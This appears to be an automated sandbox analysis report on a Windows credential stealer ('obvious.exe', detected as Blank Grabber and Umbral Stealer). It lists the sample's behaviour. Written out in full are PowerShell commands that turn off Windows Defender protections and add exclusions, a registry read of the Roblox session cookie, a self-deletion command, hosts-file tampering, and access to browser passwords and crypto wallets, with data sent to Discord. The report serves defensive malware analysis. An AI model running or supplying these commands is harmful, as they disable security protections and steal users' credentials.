Source: obvious.exe, 00000000.00000002.2322536047.0000012F5F8B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\obvious.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\obvious.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\obvious.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe' Jump to behavior
Modifies Windows Defender protection settings
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 Jump to behavior
Modifies the hosts file
Source: C:\Users\user\Desktop\obvious.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe" Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe' Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\obvious.exe Queries volume information: C:\Users\user\Desktop\obvious.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\obvious.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the hosts file
Source: C:\Users\user\Desktop\obvious.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Blank Grabber
Source: Yara match File source: obvious.exe, type: SAMPLE
Source: Yara match File source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
Yara detected Umbral Stealer
Source: Yara match File source: obvious.exe, type: SAMPLE
Source: Yara match File source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Electrum
Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus
Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum
Source: obvious.exe, 00000000.00000002.2327380876.0000012F615D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: obvious.exe, 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\obvious.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Blank Grabber
Source: Yara match File source: obvious.exe, type: SAMPLE
Source: Yara match File source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
Yara detected Umbral Stealer
Source: Yara match File source: obvious.exe, type: SAMPLE
Source: Yara match File source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500039 Sample: obvious.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 48 ip-api.com 2->48 50 discord.com 2->50 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 15 other signatures 2->62 8 obvious.exe 15 15 2->8         started        signatures3 process4 dnsIp5 52 ip-api.com 208.95.112.1, 49731, 49738, 80 TUT-ASUS United States 8->52 54 discord.com 162.159.136.232, 443, 49740, 49741 CLOUDFLARENETUS United States 8->54 40 C:\ProgramData\Microsoft\...\uGCIY.scr, PE32 8->40 dropped 42 C:\Windows\System32\drivers\etc\hosts, ASCII 8->42 dropped 44 C:\Users\user\AppData\...\obvious.exe.log, ASCII 8->44 dropped 46 C:\ProgramData\...\uGCIY.scr:Zone.Identifier, ASCII 8->46 dropped 64 Suspicious powershell command line found 8->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 8->66 68 Self deletion via cmd or bat file 8->68 70 7 other signatures 8->70 13 powershell.exe 23 8->13         started        16 cmd.exe 8->16         started        18 powershell.exe 11 8->18         started        20 9 other processes 8->20 file6 signatures7 process8 signatures9 72 Loading BitLocker PowerShell Module 13->72 22 WmiPrvSE.exe 13->22         started        24 conhost.exe 13->24         started        74 Uses ping.exe to check the status of other devices and networks 16->74 26 conhost.exe 16->26         started        28 PING.EXE 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        38 6 other processes 20->38 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS true
162.159.136.232
 discord.com United States
13335 CLOUDFLARENETUS true

